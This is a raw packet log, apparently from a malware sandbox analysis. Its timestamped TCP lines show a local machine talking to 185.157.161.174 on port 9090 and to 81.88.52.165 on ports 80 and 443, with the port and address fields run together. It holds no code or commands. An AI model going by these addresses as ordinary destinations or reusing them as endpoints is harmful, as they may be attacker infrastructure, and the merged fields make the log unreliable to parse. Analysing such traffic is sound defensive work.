                                                                                              Dec 7, 2021 13:39:02.552723885 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.559911966 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.559956074 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.559984922 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560007095 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560014963 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.560028076 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560049057 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.560094118 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.560112953 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560137987 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560161114 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560184002 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560198069 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.560206890 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560234070 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.560249090 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.560323954 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.560409069 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.567439079 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.567482948 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.567512035 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.575123072 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.575164080 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.575184107 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.575202942 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.575205088 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.575225115 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.575227976 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.575244904 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.575284958 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.652349949 CET909049736185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.700017929 CET497369090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.720045090 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.753784895 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.753829002 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.753854036 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.753868103 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.753875017 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.753906965 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.761046886 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761089087 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761112928 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761137962 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761149883 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.761162043 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761178017 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.761188030 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761213064 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761235952 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761240005 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.761260986 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761284113 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.761285067 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761307955 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761318922 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.761333942 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.761363029 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.765074015 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765110016 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765135050 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765158892 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765177011 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.765185118 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765209913 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765232086 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765234947 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:02.765256882 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:02.765280962 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.465663910 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.465684891 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.465708017 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.465712070 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.465730906 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.465749025 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.465755939 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.465769053 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.465785980 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.465821028 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.465869904 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.469029903 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.469068050 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.469094038 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.469118118 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.469141960 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.469166040 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.469188929 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.469212055 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.469213009 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.469237089 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.469249964 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.469260931 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.469285011 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.469309092 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.469310999 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.469326973 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.469352007 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.472275019 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.472321033 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.472346067 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.472368956 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.472394943 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.472419977 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.472445011 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.472465992 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.472470045 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.472495079 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.472517014 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.472552061 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.472564936 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.472588062 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.472611904 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.472631931 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.472635984 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.472680092 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.477077007 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.477118015 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.477144003 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.477168083 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.477191925 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.477216959 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.477221966 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.477240086 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.477248907 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.477262974 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.477282047 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.477288008 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.477309942 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.477312088 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.477335930 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.477358103 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.477360964 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.477380037 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.477438927 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.638130903 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.638173103 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.638196945 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.638221025 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.638240099 CET909049735185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:39:03.638278008 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.684463024 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:03.741050005 CET497359090192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:39:04.646097898 CET4973880192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:04.705339909 CET804973881.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:04.705621958 CET4973880192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:04.706928015 CET4973880192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:04.765496016 CET804973881.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:04.766505957 CET804973881.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:04.766624928 CET4973880192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:04.795217991 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:04.795268059 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:04.795591116 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:04.820869923 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:04.820899010 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:04.951805115 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:04.952022076 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.605536938 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.605603933 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.605959892 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.606043100 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.611150980 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.656877995 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.671562910 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.671602964 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.671648979 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.671667099 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.671694040 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.671751976 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.729517937 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.729595900 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.742917061 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.742949009 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.743068933 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.787595034 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.787688017 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.787755013 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.787893057 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.787925005 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.787950039 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.787955999 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.787992001 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.788021088 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.788032055 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.788073063 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.788100004 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.788683891 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.788803101 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.845877886 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.845963001 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846029997 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846107960 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.846126080 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846143007 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846193075 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.846221924 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846301079 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846311092 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.846328974 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846415043 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.846421003 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846437931 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846493959 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.846515894 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846606970 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.846635103 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846716881 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846721888 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.846735954 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846801996 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.846810102 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846823931 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846884966 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.846899986 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846950054 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.846976042 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.846987009 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.847040892 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.904875040 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.904978037 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.905024052 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.905044079 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.905065060 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.905093908 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.905134916 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.905136108 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.905150890 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.905215025 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.905242920 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.905316114 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.905354023 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.905425072 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.905462980 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.905554056 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.905580997 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.905653000 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.905708075 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.905780077 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.905828953 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.905931950 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:06.905956984 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:06.906034946 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.209682941 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.209770918 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.209820032 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.209886074 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.209887028 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.209901094 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.209945917 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.209953070 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.209965944 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.210011005 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.210024118 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.210084915 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.210086107 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.210097075 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.210143089 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.210146904 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.210160017 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.210206985 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.265947104 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266026974 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266079903 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266328096 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.266352892 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266370058 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266478062 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.266494989 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266510963 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266519070 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266603947 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.266614914 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266632080 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266648054 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.266654015 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266720057 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.266729116 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266768932 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266798019 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.266808033 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266829014 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266835928 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.266879082 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.266885042 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266899109 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266946077 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.266952991 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.266964912 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.267019987 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.267055988 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.267067909 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.267082930 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.267112970 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.267144918 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.267172098 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.267180920 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.267205000 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.267226934 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.267272949 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.267280102 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.267290115 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.267333031 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.267335892 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.267378092 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.267385960 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.267401934 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.267422915 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.267451048 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.267478943 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.267488003 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.267532110 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.267561913 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.268085003 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.268208027 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.268218040 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.268239021 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.268281937 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.268320084 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.268345118 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.268438101 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.268464088 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.268544912 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.268598080 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.268681049 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.268821001 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.268945932 CET4434973981.88.52.165192.168.2.4
                                                                                              Dec 7, 2021 13:39:07.268959045 CET49739443192.168.2.481.88.52.165
                                                                                              Dec 7, 2021 13:39:07.268975019 CET4434973981.88.52.165192.168.2.4
